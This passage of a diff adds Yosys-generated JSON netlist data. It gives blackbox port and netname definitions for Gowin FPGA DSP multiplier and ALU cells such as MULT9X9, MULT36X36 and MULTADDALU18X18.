17, 18, 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1207.15-1207.16" + } + }, + "ASEL": { + "hide_name": 0, + "bits": [ 76 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1210.8-1210.12" + } + }, + "ASIGN": { + "hide_name": 0, + "bits": [ 74 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1209.8-1209.13" + } + }, + "B": { + "hide_name": 0, + "bits": [ 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1208.15-1208.16" + } + }, + "BSEL": { + "hide_name": 0, + "bits": [ 77 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1210.13-1210.17" + } + }, + "BSIGN": { + "hide_name": 0, + "bits": [ 75 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1209.14-1209.19" + } + }, + "CE": { + "hide_name": 0, + "bits": [ 78 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1211.8-1211.10" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 79 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1212.8-1212.11" + } + }, + "DOUT": { + "hide_name": 0, + "bits": [ 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1214.15-1214.19" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 80 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1213.8-1213.13" + } + }, + "SIA": { + "hide_name": 0, + "bits": [ 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1207.17-1207.20" + } + }, + "SIB": { + "hide_name": 0, + "bits": [ 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1208.17-1208.20" + } + }, + "SOA": { + "hide_name": 0, + "bits": [ 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1215.15-1215.18" + } + }, + "SOB": { + "hide_name": 0, + "bits": [ 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1215.19-1215.22" + } + } + } + }, + "MULT36X36": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1226.1-1242.10" + }, + "parameter_default_values": { + "AREG": "0", + "ASIGN_REG": "0", + "BREG": "0", + "BSIGN_REG": "0", + "MULT_RESET_MODE": "SYNC", + "OUT0_REG": "0", + "OUT1_REG": "0", + "PIPE_REG": "0" + }, + "ports": { + "A": { + "direction": "input", + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37 ] + }, + "B": { + "direction": "input", + "bits": [ 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73 ] + }, + "ASIGN": { + "direction": "input", + "bits": [ 74 ] + }, + "BSIGN": { + "direction": "input", + "bits": [ 75 ] + }, + "CE": { + "direction": "input", + "bits": [ 76 ] + }, + "CLK": { + "direction": "input", + "bits": [ 77 ] + }, + "RESET": { + "direction": "input", + "bits": [ 78 ] + }, + "DOUT": { + "direction": "output", + "bits": [ 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150 ] + } + }, + "cells": { + }, + "netnames": { + "A": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1227.15-1227.16" + } + }, + "ASIGN": { + "hide_name": 0, + "bits": [ 74 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1229.8-1229.13" + } + }, + "B": { + "hide_name": 0, + "bits": [ 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1228.15-1228.16" + } + }, + "BSIGN": { + "hide_name": 0, + "bits": [ 75 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1229.14-1229.19" + } + }, + "CE": { + "hide_name": 0, + "bits": [ 76 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1230.8-1230.10" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 77 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1231.8-1231.11" + } + }, + "DOUT": { + "hide_name": 0, + "bits": [ 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1233.15-1233.19" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 78 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1232.8-1232.13" + } + } + } + }, + "MULT9X9": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1186.1-1204.10" + }, + "parameter_default_values": { + "AREG": "0", + "ASIGN_REG": "0", + "BREG": "0", + "BSIGN_REG": "0", + "MULT_RESET_MODE": "SYNC", + "OUT_REG": "0", + "PIPE_REG": "0", + "SOA_REG": "0" + }, + "ports": { + "A": { + "direction": "input", + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10 ] + }, + "SIA": { + "direction": "input", + "bits": [ 11, 12, 13, 14, 15, 16, 17, 18, 19 ] + }, + "B": { + "direction": "input", + "bits": [ 20, 21, 22, 23, 24, 25, 26, 27, 28 ] + }, + "SIB": { + "direction": "input", + "bits": [ 29, 30, 31, 32, 33, 34, 35, 36, 37 ] + }, + "ASIGN": { + "direction": "input", + "bits": [ 38 ] + }, + "BSIGN": { + "direction": "input", + "bits": [ 39 ] + }, + "ASEL": { + "direction": "input", + "bits": [ 40 ] + }, + "BSEL": { + "direction": "input", + "bits": [ 41 ] + }, + "CE": { + "direction": "input", + "bits": [ 42 ] + }, + "CLK": { + "direction": "input", + "bits": [ 43 ] + }, + "RESET": { + "direction": "input", + "bits": [ 44 ] + }, + "DOUT": { + "direction": "output", + "bits": [ 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62 ] + }, + "SOA": { + "direction": "output", + "bits": [ 63, 64, 65, 66, 67, 68, 69, 70, 71 ] + }, + "SOB": { + "direction": "output", + "bits": [ 72, 73, 74, 75, 76, 77, 78, 79, 80 ] + } + }, + "cells": { + }, + "netnames": { + "A": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1187.14-1187.15" + } + }, + "ASEL": { + "hide_name": 0, + "bits": [ 40 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1190.8-1190.12" + } + }, + "ASIGN": { + "hide_name": 0, + "bits": [ 38 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1189.8-1189.13" + } + }, + "B": { + "hide_name": 0, + "bits": [ 20, 21, 22, 23, 24, 25, 26, 27, 28 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1188.14-1188.15" + } + }, + "BSEL": { + "hide_name": 0, + "bits": [ 41 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1190.13-1190.17" + } + }, + "BSIGN": { + "hide_name": 0, + "bits": [ 39 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1189.14-1189.19" + } + }, + "CE": { + "hide_name": 0, + "bits": [ 42 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1191.8-1191.10" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 43 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1192.8-1192.11" + } + }, + "DOUT": { + "hide_name": 0, + "bits": [ 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1194.15-1194.19" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 44 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1193.8-1193.13" + } + }, + "SIA": { + "hide_name": 0, + "bits": [ 11, 12, 13, 14, 15, 16, 17, 18, 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1187.16-1187.19" + } + }, + "SIB": { + "hide_name": 0, + "bits": [ 29, 30, 31, 32, 33, 34, 35, 36, 37 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1188.16-1188.19" + } + }, + "SOA": { + "hide_name": 0, + "bits": [ 63, 64, 65, 66, 67, 68, 69, 70, 71 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1195.14-1195.17" + } + }, + "SOB": { + "hide_name": 0, + "bits": [ 72, 73, 74, 75, 76, 77, 78, 79, 80 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1195.18-1195.21" + } + } + } + }, + "MULTADDALU18X18": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1269.1-1305.10" + }, + "parameter_default_values": { + "A0REG": "0", + "A1REG": "0", + "ACCLOAD_REG0": "0", + "ACCLOAD_REG1": "0", + "ASIGN0_REG": "0", + "ASIGN1_REG": "0", + "B0REG": "0", + "B1REG": "0", + "BSIGN0_REG": "0", + "BSIGN1_REG": "0", + "B_ADD_SUB": "0", + "CREG": "0", + "C_ADD_SUB": "0", + "MULTADDALU18X18_MODE": "00000000000000000000000000000000", + "MULT_RESET_MODE": "SYNC", + "OUT_REG": "0", + "PIPE0_REG": "0", + "PIPE1_REG": "0", + "SOA_REG": "0" + }, + "ports": { + "A0": { + "direction": "input", + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 ] + }, + "B0": { + "direction": "input", + "bits": [ 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37 ] + }, + "A1": { + "direction": "input", + "bits": [ 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55 ] + }, + "B1": { + "direction": "input", + "bits": [ 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73 ] + }, + "C": { + "direction": "input", + "bits": [ 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127 ] + }, + "SIA": { + "direction": "input", + "bits": [ 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145 ] + }, + "SIB": { + "direction": "input", + "bits": [ 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163 ] + }, + "ASIGN": { + "direction": "input", + "bits": [ 164, 165 ] + }, + "BSIGN": { + "direction": "input", + "bits": [ 166, 167 ] + }, + "ASEL": { + "direction": "input", + "bits": [ 168, 169 ] + }, + "BSEL": { + "direction": "input", + "bits": [ 170, 171 ] + }, + "CASI": { + "direction": "input", + "bits": [ 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226 ] + }, + "CE": { + "direction": "input", + "bits": [ 227 ] + }, + "CLK": { + "direction": "input", + "bits": [ 228 ] + }, + "RESET": { + "direction": "input", + "bits": [ 229 ] + }, + "ACCLOAD": { + "direction": "input", + "bits": [ 230 ] + }, + "DOUT": { + "direction": "output", + "bits": [ 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 282, 283, 284 ] + }, + "CASO": { + "direction": "output", + "bits": [ 285, 286, 287, 288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 298, 299, 300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 315, 316, 317, 318, 319, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 330, 331, 332, 333, 334, 335, 336, 337, 338, 339 ] + }, + "SOA": { + "direction": "output", + "bits": [ 340, 341, 342, 343, 344, 345, 346, 347, 348, 349, 350, 351, 352, 353, 354, 355, 356, 357 ] + }, + "SOB": { + "direction": "output", + "bits": [ 358, 359, 360, 361, 362, 363, 364, 365, 366, 367, 368, 369, 370, 371, 372, 373, 374, 375 ] + } + }, + "cells": { + }, + "netnames": { + "A0": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1270.14-1270.16" + } + }, + "A1": { + "hide_name": 0, + "bits": [ 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1272.14-1272.16" + } + }, + "ACCLOAD": { + "hide_name": 0, + "bits": [ 230 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1282.7-1282.14" + } + }, + "ASEL": { + "hide_name": 0, + "bits": [ 168, 169 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1277.13-1277.17" + } + }, + "ASIGN": { + "hide_name": 0, + "bits": [ 164, 165 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1276.13-1276.18" + } + }, + "B0": { + "hide_name": 0, + "bits": [ 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1271.14-1271.16" + } + }, + "B1": { + "hide_name": 0, + "bits": [ 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1273.14-1273.16" + } + }, + "BSEL": { + "hide_name": 0, + "bits": [ 170, 171 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1277.19-1277.23" + } + }, + "BSIGN": { + "hide_name": 0, + "bits": [ 166, 167 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1276.20-1276.25" + } + }, + "C": { + "hide_name": 0, + "bits": [ 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98, 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1274.14-1274.15" + } + }, + "CASI": { + "hide_name": 0, + "bits": [ 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207, 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1278.14-1278.18" + } + }, + "CASO": { + "hide_name": 0, + "bits": [ 285, 286, 287, 288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 298, 299, 300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 315, 316, 317, 318, 319, 320, 321, 322, 323, 324, 325, 326, 327, 328, 329, 330, 331, 332, 333, 334, 335, 336, 337, 338, 339 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1284.15-1284.19" + } + }, + "CE": { + "hide_name": 0, + "bits": [ 227 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1279.7-1279.9" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 228 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1280.7-1280.10" + } + }, + "DOUT": { + "hide_name": 0, + "bits": [ 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261, 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 282, 283, 284 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1283.15-1283.19" + } + }, + "RESET": { + "hide_name": 0, + "bits": [ 229 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1281.7-1281.12" + } + }, + "SIA": { + "hide_name": 0, + "bits": [ 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1275.14-1275.17" + } + }, + "SIB": { + "hide_name": 0, + "bits": [ 146, 147, 148, 149, 150, 151, 152, 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1275.19-1275.22" + } + }, + "SOA": { + "hide_name": 0, + "bits": [ 340, 341, 342, 343, 344, 345, 346, 347, 348, 349, 350, 351, 352, 353, 354, 355, 356, 357 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1285.15-1285.18" + } + }, + "SOB": { + "hide_name": 0, + "bits": [ 358, 359, 360, 361, 362, 363, 364, 365, 366, 367, 368, 369, 370, 371, 372, 373, 374, 375 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1285.20-1285.23" + } + } + } + }, + "MULTALU18X18": { + "attributes": { + "blackbox": "00000000000000000000000000000001", + "cells_not_processed": "00000000000000000000000000000001", + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1307.1-1331.10" + }, + "parameter_default_values": { + "ACCLOAD_REG0": "0", + "ACCLOAD_REG1": "0", + "AREG": "0", + "ASIGN_REG": "0", + "BREG": "0", + "BSIGN_REG": "0", + "B_ADD_SUB": "0", + "CREG": "0", + "C_ADD_SUB": "0", + "DREG": "0", + "DSIGN_REG": "0", + "MULTALU18X18_MODE": "00000000000000000000000000000000", + "MULT_RESET_MODE": "SYNC", + "OUT_REG": "0", + "PIPE_REG": "0" + }, + "ports": { + "A": { + "direction": "input", + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 ] + }, + "B": { + "direction": "input", + "bits": [ 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37 ] + }, + "CLK": { + "direction": "input", + "bits": [ 38 ] + }, + "CE": { + "direction": "input", + "bits": [ 39 ] + }, + "RESET": { + "direction": "input", + "bits": [ 40 ] + }, + "ASIGN": { + "direction": "input", + "bits": [ 41 ] + }, + "BSIGN": { + "direction": "input", + "bits": [ 42 ] + }, + "ACCLOAD": { + "direction": "input", + "bits": [ 43 ] + }, + "DSIGN": { + "direction": "input", + "bits": [ 44 ] + }, + "C": { + "direction": "input", + "bits": [ 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98 ] + }, + "D": { + "direction": "input", + "bits": [ 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152 ] + }, + "CASI": { + "direction": "input", + "bits": [ 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207 ] + }, + "DOUT": { + "direction": "output", + "bits": [ 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261 ] + }, + "CASO": { + "direction": "output", + "bits": [ 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 282, 283, 284, 285, 286, 287, 288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 298, 299, 300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 315, 316 ] + } + }, + "cells": { + }, + "netnames": { + "A": { + "hide_name": 0, + "bits": [ 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1308.14-1308.15" + } + }, + "ACCLOAD": { + "hide_name": 0, + "bits": [ 43 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1311.7-1311.14" + } + }, + "ASIGN": { + "hide_name": 0, + "bits": [ 41 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1310.7-1310.12" + } + }, + "B": { + "hide_name": 0, + "bits": [ 20, 21, 22, 23, 24, 25, 26, 27, 28, 29, 30, 31, 32, 33, 34, 35, 36, 37 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1308.17-1308.18" + } + }, + "BSIGN": { + "hide_name": 0, + "bits": [ 42 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1310.14-1310.19" + } + }, + "C": { + "hide_name": 0, + "bits": [ 45, 46, 47, 48, 49, 50, 51, 52, 53, 54, 55, 56, 57, 58, 59, 60, 61, 62, 63, 64, 65, 66, 67, 68, 69, 70, 71, 72, 73, 74, 75, 76, 77, 78, 79, 80, 81, 82, 83, 84, 85, 86, 87, 88, 89, 90, 91, 92, 93, 94, 95, 96, 97, 98 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1312.14-1312.15" + } + }, + "CASI": { + "hide_name": 0, + "bits": [ 153, 154, 155, 156, 157, 158, 159, 160, 161, 162, 163, 164, 165, 166, 167, 168, 169, 170, 171, 172, 173, 174, 175, 176, 177, 178, 179, 180, 181, 182, 183, 184, 185, 186, 187, 188, 189, 190, 191, 192, 193, 194, 195, 196, 197, 198, 199, 200, 201, 202, 203, 204, 205, 206, 207 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1313.14-1313.18" + } + }, + "CASO": { + "hide_name": 0, + "bits": [ 262, 263, 264, 265, 266, 267, 268, 269, 270, 271, 272, 273, 274, 275, 276, 277, 278, 279, 280, 281, 282, 283, 284, 285, 286, 287, 288, 289, 290, 291, 292, 293, 294, 295, 296, 297, 298, 299, 300, 301, 302, 303, 304, 305, 306, 307, 308, 309, 310, 311, 312, 313, 314, 315, 316 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1315.15-1315.19" + } + }, + "CE": { + "hide_name": 0, + "bits": [ 39 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1309.11-1309.13" + } + }, + "CLK": { + "hide_name": 0, + "bits": [ 38 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1309.7-1309.10" + } + }, + "D": { + "hide_name": 0, + "bits": [ 99, 100, 101, 102, 103, 104, 105, 106, 107, 108, 109, 110, 111, 112, 113, 114, 115, 116, 117, 118, 119, 120, 121, 122, 123, 124, 125, 126, 127, 128, 129, 130, 131, 132, 133, 134, 135, 136, 137, 138, 139, 140, 141, 142, 143, 144, 145, 146, 147, 148, 149, 150, 151, 152 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1312.16-1312.17" + } + }, + "DOUT": { + "hide_name": 0, + "bits": [ 208, 209, 210, 211, 212, 213, 214, 215, 216, 217, 218, 219, 220, 221, 222, 223, 224, 225, 226, 227, 228, 229, 230, 231, 232, 233, 234, 235, 236, 237, 238, 239, 240, 241, 242, 243, 244, 245, 246, 247, 248, 249, 250, 251, 252, 253, 254, 255, 256, 257, 258, 259, 260, 261 ], + "attributes": { + "src": "c:\\OSS-CA~1\\bin\\../share/yosys/gowin/cells_xtra.v:1314.15-1314.19" + } + }, + "DSIGN": { + "hide_name": 0, + "bits": [ 44 ], + "attributes": { + "src": 